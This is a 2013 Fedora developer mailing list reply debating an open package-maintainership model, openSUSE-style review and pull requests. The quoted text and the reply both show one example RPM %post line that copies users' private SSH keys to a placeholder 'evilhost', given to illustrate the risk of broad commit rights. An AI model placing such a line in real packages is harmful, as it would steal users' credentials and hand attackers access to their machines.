On Tue, 2013-05-14 at 14:20 -0600, Kevin Fenzi wrote:
> On Tue, 14 May 2013 21:04:59 +0100
> "Richard W.M. Jones" <rjo...@redhat.com> wrote:
> 
> > I suspect the main one is someone putting:
> > 
> > %post
> > scp /home/*/.ssh/id_rsa evilhost:
> > 
> > into a commonly used package, or something equivalent but more subtle
> > than that.
> > 
> > Basically you're giving root access to everyone with a FAS packager
> > account (not that the current situation is that much better).
> 
> well, no, that's not what I was talking about, that is a completely
> different issue. ;) 
> 
> I was referring to the fact that if we had a collection of around 14,000
> packages and a pool of around 1400 maintainers if everyone just
> wandered around working on whatever they liked you would get X people
> fixing the same bug and duplicating effort, X people talking to
> upstream and telling them different things, X people figuring out a
> problem and waiting for something to happen for a real solution and
> someone else wandering in and fixing it in a poor/hacky way, X people
> telling users one decision and Y people telling them another, etc. 
> 
> If you have a small set of interested maintainers they can communicate
> between the group and divide work and come to consensus. Things don't
> scale to do that over the entire collection on every decision. 

Well the open model has already been tried and proven in openSUSE, and
they're still using it because it actually works really well.  There
aren't usually any issues regarding overlap of work, though admittedly
that community is smaller than Fedora's. It's hard to get away with
scp /home/*/.ssh/id_rsa evilhost because every change is always reviewed
by a small group of maintainers responsible for a collection of
packages.

I certainly think Fedora could benefit a lot from at least a slightly
more collaborative approach.  For example, in openSUSE when there is a
problem with a really easy fix, I make a bugzilla report, fix it, my
request gets accepted (or not) a few days later, and problem solved.  In
Fedora when there is a problem with an easy fix, I make a bugzilla
report, it gets assigned to someone awesome enough to have 200-800 other
open bugs to deal with, and nothing happens for two months until a
provenpackager stumbles upon the bug.

We already use git, so the simple solution with minimal change to the
status quo is to leave the maintainership model as-is and add pull
requests.  (That said I'm not advocating this as I have zero Fedora
packaging experience; I'm just trying to get this conversation off the
ground.)

-- 
devel mailing list
devel@lists.fedoraproject.org
https://admin.fedoraproject.org/mailman/listinfo/devel